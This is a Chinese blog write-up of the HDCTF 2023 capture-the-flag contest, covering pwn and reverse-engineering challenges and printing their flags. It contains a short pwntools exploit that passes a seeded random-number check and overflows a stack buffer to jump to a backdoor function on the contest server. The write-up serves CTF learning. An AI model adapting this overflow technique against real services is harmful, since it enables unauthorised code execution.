HDCTF 2023个人WP

最新推荐文章于 2024-04-26 09:16:46 发布
最新推荐文章于 2024-04-26 09:16:46 发布
阅读量336 收藏 1
点赞数 1
分类专栏: CTF 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64787014/article/details/130323734
版权

HDCTF WP

放个排名吧(我知道我很菜,轻点喷我)
在这里插入图片描述

Welcome To HDCTF 2023

死五次得答案
在这里插入图片描述
flag:NSSCTF{Wel3ome_t@_HDCTF_2o23}

pwnner

因为提供了随机数的种子,所以本地编译一下,执行可以看到随机数为
在这里插入图片描述
1956681178
通过随机数检查
之后是v3栈溢出,看到有后门函数
可以构造EXP

from pwn import *
p = remote('node5.anna.nssctf.cn',28216)
#p = process("./pwnner") 
p.recvuntil(b'so input your name:')
p.sendline(b'1956681178')
p.recvuntil(b'next?\n')
p.sendline(b'a'*(0x40+8)+p64(0x4008b2))
p.interactive()

在这里插入图片描述
flag:NSSCTF{612d3c69-453d-4092-aoaf-37ee2881afaa}

easy_re

由exeinfo查壳,有upx壳,在kali里面脱壳

在这里插入图片描述

ida打开,找到关键函数
在这里插入图片描述
分析func,看到字母表和左移右移可以反应出来base64解码
在变量a中可以找到相应的密文
在这里插入图片描述
解码后即可找到flag
在这里插入图片描述
flag:NSSCTF{Y0u_h@v2_//@57er3d_7he_r3v3rs3}

easyasm

看到题目可以得知是分析汇编的题目,直接ida打开,分析代码可知,主要为对数组进行遍历,将每个元素异或16
在这里插入图片描述
下面是脚本
在这里插入图片描述
得到flag:NSSCTF{Just_a_e3sy_aSm}

买了些什么呢

打开发现是个题目,用数学方式背包算法直接解,re是啥awa

class good:
     def __init__(self,num,eavy,value):
         self.num = num
         self.value = value
         self.eavy = eavy
         self.avgvalue = value / eavy
 money = 0
 bag = 50
 goodlist = list()
 flag = list()
 for i in range(40):
     num,eavy,value = map(int,input().split())
     goodlist.append(good(num,eavy,value))
 avglist
最低0.47元/天 解锁文章
dbuj7
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023年江西省工业互联网大赛WP
12-25
2023年江西省工业互联网大赛WP
WordPress个人博客主题wp-Concise-v1.0
10-19
WordPress个人博客主题wp-Concise-v1.0,简约博客全宽排版 1、基于php7.4环境下开发,可能不适于7.4以上环境 2、侧边栏插件在小工具里面,主题设置里可以设置自定义图片背景。
【PWN · ret2text | 伪rand()】[HDCTF 2023]pwnner
Mr_Fmnwon的博客
07-26 486
一道简单的ret2text,加上一些伪随机的知识,对于本蒟蒻萌新来说,比较新,值得记录。伪随机数以及ctypes库的使用!
HDCTF 2023 Pwn WriteUp
红叶的博客
04-23 783
本人是菜狗,比赛的时候只做出来1题,2题有思路但是不会,还是太菜了。栈迁移还是不会,但又都是栈迁移的题,真头大。得找时间好好学学。
re题(3)[HDCTF 2023]easy_re--Base64.UPX壳.脱壳
最新发布
2301_80907001的博客
04-26 131
将脱壳后的文件拖到ida,按F5可以看到伪代码,对伪代码进行分析,知道是base64加密。脱完壳再查一下,发现已经变成了,text文件,说明脱壳完成。最后用python的base64模块进行解密,得到flag。按shift+F12可以查看字符串,里面有要解密的字符串。首先将下载好的附件查一下壳,发现是upx壳。然后打开cmd,用命令对upx脱壳。
2023HDCTF部分wp(pwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 926
HDCTF部分wp,指我a出来的
HDCTF2023 WP
m0_68757308的博客
04-23 1136
HDCTF2023 WP
[HDCTF 2023]ExtremeMisc WriteUp
baiqilolo的博客
04-23 616
注意,这个压缩包里面存在伪加密,需要先去除伪加密,再进行密码爆破。这个数据是每个字节内都颠倒了一下,如前四个字节原本应该是50 4B 03 04,这个压缩包的名字也给我们了提示,所以只要写个脚本让他们在字节内再次颠倒回去就行了。他会创建一个新的文件,下的文件里存放着颠倒后的十六进制数据,需要注意的是,处理前和处理后的数据都要经过在线网站的去空格和换行符这也是这个脚本的不足之处。拿到一个压缩包,里面有一个图片,解压。压缩包密码为:haida,将文件解压,发现解压出来的文件报错了。密码:w98d@ud。
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
2023 CryptoCTF wp by lingfeng (medium分类-3)
07-22
Aslv1-output.txt
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
HDCTF 2023-省外赛道|MISC
zerorzeror的博客
04-23 890
HDCTF 2023-省外赛道|MISC
HDCTF 2023 复盘
arcuied
04-24 727
HDCTF2023 当时做了一半做不出来的题复盘
HDCTF2023部分题解
m0_73700261的博客
04-24 294
我们可以post它,但是post什么内容呢,这里的模板一样我们试一试{{7*7}}发现回显了文件,证明这是个smarty的模板注入 ,接着就按正常的命令注入来就行了。直接去js源代码找弹窗函数。这个题目打开是一个博客入口。接着可以试试直接命令执行。发现他成功回显一个49。打开来发现是一个游戏。
2023 HDCTF --- Crypto wp
3tefanie丶zhou的博客
04-23 849
【无法挽留的很多人和事,那么能够留下来的,那就尽量都留下,长长久久,关起门来,仔细藏好,不为人知。】
HDCTF部分misc复现
fivesheeptree的博客
04-26 173
在图片末尾发现一段base64加密字符,解密即flag或者在线网站解密得到flag将图片中冗杂的zip十六进制数据新建文本保存,得到一个zip,根据zip文件名字提示Dic,使用字典攻击得到密码。但是我直接偷懒了,使用工具Banzip工发现打开后得到文件Reverse.piz(可以知道十六进制数据倒序即可得到zip文件)得到两个加密文件,将其暴力破解打开(密码9724)
SUCTF 2018 招新赛之Misc篇刷题记录(14)
Aluxian_的博客
08-20 258
【代码】NSSCTF之Misc篇刷题记录(14)
HDCTF2023 - Reverse方向全WP
Sciurdae的博客
11-20 886
不像是花指令,那应该就是SMC了,本来想用动调的,但这里加了反调试,不知道怎么去除,结合前面得到的key,找修改的地方。俩处加密,第一处对一句话进行一个f(x,y)的加密,这里加密用到了俩个伪随机数。再结合flag 为 28 位,可以得到,“I want to play basketballI w”再结合flag 为 28 位,可以得到,“I want to play basketballI w”之后,选中有用的数据U未定义一下,再P创建函数,F5反编译,得到。一个01背包问题,动态规划,写个EXP解决。
HDCTF2023wp
leekos的博客,分享web安全相关知识~
04-24 1029
sql注入题目,username必须为admin,此处我们需要从密码着手。乍一看好像是一样的,但是单双引号有点区别,我们需要再套。发现很多 0、1的二进制数据,我们把它提取出来放到。于是我们写个脚本将这些16进制的转化为普通的文本文件。我们除了让输入的密码与真正的密码一致外,还可以让。实际上此处为一张空表,我们需要使用另一种做法(其实这里的密码是字母(以前一般都是数字),使用。得到一个wav音频和一张绿色的图片,我们使用。写这种编码转化的脚本不是很会,需要多学一学。
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: ...根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值